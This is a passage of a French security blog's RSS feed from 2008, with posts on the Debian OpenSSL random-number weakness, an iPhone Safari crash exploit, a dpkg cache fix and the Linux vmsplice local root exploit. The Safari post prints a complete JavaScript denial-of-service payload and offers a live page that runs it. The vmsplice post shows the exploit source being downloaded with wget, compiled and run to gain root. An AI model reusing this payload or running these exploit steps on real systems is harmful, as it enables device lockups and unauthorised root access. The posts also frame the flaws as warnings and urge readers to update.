Console, monospace;"><div>1<br />2<br />3<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">MD_Update(&amp;m,buf,j);<br /> [ .. ]<br /> MD_Update(&amp;m,buf,j); /* purify complains */</div></td></tr></tbody></table></div><p>Ces lignes ont été retirée parce qu&#8217;elle produisait des erreurs avec certains outils (Utilisation d&#8217;une donnée non initialisée dans la plupart des projets liés a OpenSSL). Mais la suppression de des lignes en question à eu des effets collatéraux sur OpenSSL PRNG. En fait au lieux de mélanger différentes variables aléatoire pour la génération initiale, la seule variable &laquo;&nbsp;aléatoire&nbsp;&raquo; qui a été utilisée étais le PID du générateur -et quand on sais que le nombre maximal par défaut sous linux est de 32,768- le résultat est que PRNG utilise une très petite fourchette de valeurs initiales.<br /> <span id="more-147"></span></p><h2><li>Impact:</li></h2><p>Toutes les clés SSL et SSH générées sur des systèmes basé sur Debian (Ubuntu, Debina, Mint&#8230;) entre Septembre 2006 et le 13 Mai 2008 sont affectée par la vulnérabilité. Dans le cas des clé SSL, tout les certificats doivent être révoqué et a nouveau généré. Tous les administrateurs système doivent auditer leurs clés pour être sur qu&#8217;ils ne sont pas touché par la vulnérabilité ! D&#8217;ailleurs tout les outils liés de près ou de loin a OpenSSL PRNG peut être vulnérable, attention.</p><p>Tout flux d&#8217;un serveur SSH qui utilise une clé générée par un système vulnérable peut être sujet a une interception (man in the middle) sans que l&#8217;administrateur ne se rende compte de rien. Je vous rassure, les projets Debian et Ubuntu on développé des outils pour identifier les clé vulnérables, vous trouverez plus d&#8217;information a leurs propos en fin de page.</p><p>Q: Combien de temps cela prendrais de générer toutes les clés touchées ?<br /> A: Avec 31 Xeon @ 2.33Ghz. Cela prend deux heures pour les clés DSA 1024-bit et RSA 2048-bit pour x86. Les clés RSA 4096-bit sont générés en 6 heures. En ce qui concerne les clés RSA 8192-bit cela prendrais environs 100 heures.</p><p>Q: Combien de temps cela prendrait il de cracker un SSH avec ces clés ?<br /> A: Tout dépend de la vitesse du réseau et de la configuration du serveur SSH. Il devrait être possible d&#8217;essayer toutes les clés (32,767 DSA 1024 et RSA 2048) en quelques heures. Attentions aux scripts tels que Fail2Ban (anti-bruteforce).. etc.</p><p>Q: J&#8217;utilise une clé RSA 16384 bit, suis-je vulnérable ?<br /> A: Oui, c&#8217;est juste une question de temps (processeur et réseau). Pour le RSA 8192 bit, cela prend environ 3100 heures pour générer toutes les clés. J&#8217;imagine que pour le 16384 bit, nous serions dans les 100,000 heures (en temps CPU). Mais gardez en tête que la &laquo;&nbsp;fourchette&nbsp;&raquo; réele est bien plus mince, basée sur PID du processus qui a servit a générer le tout. Donc, inutile de générer toutes les clé pour en couvrir la majorité ! (La plupart de ces clés sont dans les premiers 3,000 PID)..</p><p><a rel="nofollow" href="http://www.debian.org/security/key-rollover/">http://www.debian.org/security/key-rollover/</a><br /> <a rel="nofollow" href="http://wiki.debian.org/SSLkeys">http://wiki.debian.org/SSLkeys</a></p><p><a href='http://www.crashdump.fr/wp-content/uploads/2008/05/random_number.png'><img src="http://www.crashdump.fr/wp-content/uploads/2008/05/random_number-250x144.png" alt="" title="random_number" width="250" height="144" class="alignnone size-thumbnail wp-image-148" /></a></p> ]]></content:encoded> <wfw:commentRss>http://www.crashdump.fr/debian/faille-ssl-debian-rgn-147/feed/</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>iPhone &#8211; Exploit DoS Safari, ça commence !</title><link>http://www.crashdump.fr/iphone/iphone-exploit-dos-safari-ca-commence-99/</link> <comments>http://www.crashdump.fr/iphone/iphone-exploit-dos-safari-ca-commence-99/#comments</comments> <pubDate>Wed, 23 Apr 2008 16:33:54 +0000</pubDate> <dc:creator>Crashdump</dc:creator> <category><![CDATA[iPhone]]></category> <category><![CDATA[bug]]></category> <category><![CDATA[code]]></category> <category><![CDATA[crash]]></category> <category><![CDATA[DoS]]></category> <category><![CDATA[exploit]]></category> <category><![CDATA[Georgi Guninski]]></category> <category><![CDATA[remote execution]]></category> <category><![CDATA[Safari]]></category> <category><![CDATA[verrouillage]]></category><guid isPermaLink="false">http://blog.crashdump.fr/?p=99</guid> <description><![CDATA[l&#8217;iPhone est censé être une plateforme sécurisé tant les données qui peuvent être stockées sur la machine sont confidentielles &#8211; imaginez que n&#8217;importe qui puisse avoir accès a vos contact, mail ou sms. Apple a du faire de son mieux, mais rien n&#8217;est parfait. Un exploit touchant le navigateur web (Safari) a été découvert récemment, [...]]]></description> <content:encoded><![CDATA[<p>l&#8217;iPhone est censé être une plateforme sécurisé tant les données qui peuvent être stockées sur la machine sont confidentielles &#8211; imaginez que n&#8217;importe qui puisse avoir accès a vos contact, mail ou sms. Apple a du faire de son mieux, mais rien n&#8217;est parfait. Un exploit touchant le navigateur web (Safari) a été découvert récemment, un exploit dangereux pour ce smart phone, tant au niveau sécurité que au niveau de la mauvaise publicité qui peut en découler.</p><p>Le code que je vous propose ci dessous n&#8217;est pas complet, il a été modifié depuis l&#8217;une des premières version de l&#8217;exploit pour Safari sur Mac. Il suffit de se rendre sur la page contenant  le code malicieux avec votre iPhone pour qu&#8217;il le verrouille.<br /> <span id="more-99"></span></p><li><h2>remote execution DoS vulnerability:</h2></li><p><em>Le code que je met a votre disposition ici l&#8217;est juste a titre d&#8217;exemple (de même pour la page de test..), je ne serais donc pas responsable &#8211; quoi qu&#8217;il se passe &#8211; de ce qu&#8217;il pourrais arriver si vous ouvrez la page. Si vous voulez quand même tenter l&#8217;aventure, gardez a l&#8217;esprit que l&#8217;iPhone va complètement se verrouiller et vous perdrez donc toutes les données des applications lancées a ce moment là.</em></p><div class="codecolorer-container text default javascript" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;height:450px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br />3<br />4<br />5<br />6<br />7<br />8<br />9<br />10<br />11<br />12<br />13<br />14<br />15<br />16<br />17<br />18<br />19<br />20<br />21<br />22<br />23<br />24<br />25<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">&lt;html&gt;<br /> &nbsp; &nbsp; &nbsp; &nbsp; Copyright Georgi Guninski<br /> &nbsp; &nbsp; &nbsp; &nbsp; &lt;br&gt;<br /> &nbsp; &nbsp; &nbsp; &nbsp; Cannot be used in vulnerability databases<br /> &nbsp; &nbsp; &nbsp; &nbsp; &lt;br&gt;<br /> &nbsp; &nbsp; &nbsp; &nbsp; Especially securityfocus/mitre/cve/cert<br /> &nbsp; &nbsp; &nbsp; &nbsp; &lt;script&gt;<br /> &nbsp; &nbsp; &nbsp; &nbsp; var s=String.fromCharCode(257);<br /> &nbsp; &nbsp; &nbsp; &nbsp; var ki=&quot;&quot;;<br /> &nbsp; &nbsp; &nbsp; &nbsp; var me=&quot;&quot;;<br /> &nbsp; &nbsp; &nbsp; &nbsp; for(i=0; i&lt;1024; i++){<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ki=ki+s;<br /> &nbsp; &nbsp; &nbsp; &nbsp; }<br /> &nbsp; &nbsp; &nbsp; &nbsp; for(i=0; i&lt;1024; i++){<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; me=me+ki;<br /> &nbsp; &nbsp; &nbsp; &nbsp; }<br /> &nbsp; &nbsp; &nbsp; &nbsp; var ov=s;<br /> &nbsp; &nbsp; &nbsp; &nbsp; for(i=0; i&lt;28; i++) ov += ov;<br /> &nbsp; &nbsp; &nbsp; &nbsp; for(i=0; i&lt;88; i++) ov += me;<br /> &nbsp; &nbsp; &nbsp; &nbsp; alert(&quot;done generating&quot;);<br /> &nbsp; &nbsp; &nbsp; &nbsp; var fuckbill=escape(ov);<br /> &nbsp; &nbsp; &nbsp; &nbsp; alert(&quot;done escape&quot;);<br /> &nbsp; &nbsp; &nbsp; &nbsp; alert(fuckbill);<br /> &nbsp; &nbsp; &nbsp; &nbsp; &lt;/script&gt;<br /> &lt;/html&gt;</div></td></tr></tbody></table></div><p>La vulnérabilité a été testée sur un firmware 1.1.4, mais elle est surement exploitable sur des versions antérieures (Laissez moi donc un commentaire si vous l&#8217;avez testé !).</p><p>Malheureusement les firmwares ne sont mis a jours que très rarement sur l&#8217;iPhone et même si l&#8217;exploit a déjà été fixé sur les autres plateformes, il faudra surement attendre la &laquo;&nbsp;version 2&#8243; (surement cet été) pour pouvoir en profiter ! Je vous conseille donc de désactiver le Javascript.</p><p>Voici le lien pour télécharger le code au format texte.<br /> Qu&#8217;importe les risques, vous voulez tenter l&#8217;aventure ? Cliquez ici ! (Attention, le simple fait de charger la page va exécuter le code malicieux !)</p><p>Même si la faille a été corrigée sur les dernières version de Safari disponibles au téléchargement, la version iPhone est toujours vulnérable.. on espère donc une mise a jours rapide de notre navigateur mobile préféré !</p> ]]></content:encoded> <wfw:commentRss>http://www.crashdump.fr/iphone/iphone-exploit-dos-safari-ca-commence-99/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Bug dpkg ? La solution !</title><link>http://www.crashdump.fr/debian/bug-dpkg-la-solution-68/</link> <comments>http://www.crashdump.fr/debian/bug-dpkg-la-solution-68/#comments</comments> <pubDate>Wed, 12 Mar 2008 22:27:59 +0000</pubDate> <dc:creator>Crashdump</dc:creator> <category><![CDATA[Debian]]></category> <category><![CDATA[avaible]]></category> <category><![CDATA[bug]]></category> <category><![CDATA[clean]]></category> <category><![CDATA[dpkg]]></category> <category><![CDATA[erreur]]></category><guid isPermaLink="false">http://blog.crashdump.fr/index.php/2008/03/12/bug-dpkg-la-solution/</guid> <description><![CDATA[Vous avez l&#8217;erreur suivante ? 123# dpkg -i xxx.deb dpkg: erreur d'analyse syntaxique, dans le fichier « /var/lib/dpkg/available » près de la ligne 9601 paquet « xxx »: &#160;saut de ligne dans le nom de champ « S » Parfois, il arrive que les fichiers de cache soit corrompus.. soit ! Il suffit de les [...]]]></description> <content:encoded><![CDATA[<p>Vous avez l&#8217;erreur suivante ?</p><div class="codecolorer-container text default" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br />3<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap"># dpkg -i xxx.deb<br /> dpkg: erreur d'analyse syntaxique, dans le fichier « /var/lib/dpkg/available » près de la ligne 9601 paquet « xxx »:<br /> &nbsp;saut de ligne dans le nom de champ « S »</div></td></tr></tbody></table></div><p>Parfois, il arrive que les fichiers de cache soit corrompus.. soit ! Il suffit de  les purger !</p><div class="codecolorer-container text default" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap"># dpkg --clear-avail<br /> # aptitude update</div></td></tr></tbody></table></div><p>et c&#8217;est reparti !</p> ]]></content:encoded> <wfw:commentRss>http://www.crashdump.fr/debian/bug-dpkg-la-solution-68/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Vmsplice root exploit</title><link>http://www.crashdump.fr/securite/vmsplice-root-exploit-70/</link> <comments>http://www.crashdump.fr/securite/vmsplice-root-exploit-70/#comments</comments> <pubDate>Tue, 12 Feb 2008 08:40:28 +0000</pubDate> <dc:creator>Crashdump</dc:creator> <category><![CDATA[Sécurité]]></category> <category><![CDATA[bug]]></category> <category><![CDATA[By]]></category> <category><![CDATA[exploit]]></category> <category><![CDATA[faille]]></category> <category><![CDATA[root]]></category> <category><![CDATA[vmsplice]]></category><guid isPermaLink="false">http://blog.crashdump.fr/index.php/2008/02/12/vmsplice-root-exploit/</guid> <description><![CDATA[Depuis peu, une faille a été découverte dans l&#8217;appel du système vmsplice(), les noyaux Linux 2.6.17 à 2.6.24.1 sont touchés. Elle est plutôt critique puisqu&#8217;un simple utilisateur peut devenir root en l&#8217;exploitant. 12$ uname -smr Linux 2.6.23.16.. i686 Voici un exemple d&#8217;utilisation : 123456789101112131415161718192021$ cd /tmp $ wget http://www.crashdump.fr/~polux/rootexploit/rootexploit.c $ gcc -o rootexploit rootexploit.c $ [...]]]></description> <content:encoded><![CDATA[<p>Depuis peu, une faille a été découverte dans l&#8217;appel du système vmsplice(), les noyaux Linux 2.6.17 à 2.6.24.1 sont touchés. Elle est plutôt critique puisqu&#8217;un simple utilisateur peut devenir root en l&#8217;exploitant.</p><div class="codecolorer-container text default" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">$ uname -smr<br /> Linux 2.6.23.16.. i686</div></td></tr></tbody></table></div><p>Voici un exemple d&#8217;utilisation :</p><div class="codecolorer-container text default" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;height:450px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br />3<br />4<br />5<br />6<br />7<br />8<br />9<br />10<br />11<br />12<br />13<br />14<br />15<br />16<br />17<br />18<br />19<br />20<br />21<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">$ cd /tmp<br /> $ wget http://www.crashdump.fr/~polux/rootexploit/rootexploit.c<br /> $ gcc -o rootexploit rootexploit.c<br /> $ ./rootexploit<br /> -----------------------------------<br /> Linux vmsplice Local Root Exploit<br /> By qaaz<br /> -----------------------------------<br /> [+] mmap: 0x0 .. 0x1000<br /> [+] page: 0x0<br /> [+] page: 0x20<br /> [+] mmap: 0x4000 .. 0x5000<br /> [+] page: 0x4000<br /> [+] page: 0x4020<br /> [+] mmap: 0x1000 .. 0x2000<br /> [+] page: 0x1000<br /> [+] mmap: 0xb7dee000 .. 0xb7e20000<br /> [+] root<br /> Exploit gone!<br /> # id -u<br /> 0</div></td></tr></tbody></table></div><p><span id="more-70"></span><br /> &#8230; voila qui est plutôt grave, mettez donc a jour vos kernel:</p><div class="codecolorer-container text default" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">$ uname -smr<br /> Linux 2.6.24.2.. i686</div></td></tr></tbody></table></div><div class="codecolorer-container text default" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br />3<br />4<br />5<br />6<br />7<br />8<br />9<br />10<br />11<br />12<br />13<br />14<br />15<br />16<br /></div></td><td><div class="text codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap">$ ./rootexploit<br /> -----------------------------------<br /> &nbsp;Linux vmsplice Local Root Exploit<br /> -----------------------------------<br /> [+] mmap: 0x0 .. 0x1000<br /> [+] page: 0x0<br /> [+] page: 0x20<br /> [+] mmap: 0x4000 .. 0x5000<br /> [+] page: 0x4000<br /> [+] page: 0x4020<br /> [+] mmap: 0x1000 .. 0x2000<br /> [+] page: 0x1000<br /> [+] mmap: 0xb7dfc000 .. 0xb7e2e000<br /> [-] vmsplice: Bad address<br /> $ id -u<br /> 1000</div></td></tr></tbody></table></div><p>De plus, on pourrais imaginer une utilisation de cet exploit via des scripts cgi, php,.. Mal programmé &#8211; En exploitant une faille include &#8211; Et la je vous laisse imaginer le drame !</p><p>Un petit conseil donc: Mettez votre système à jour régulièrement !</p> ]]></content:encoded> <wfw:commentRss>http://www.crashdump.fr/securite/vmsplice-root-exploit-70/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
<!-- Served from: www.crashdump.fr @ 2012-02-04 20:03:22 by W3 Total Cache -->
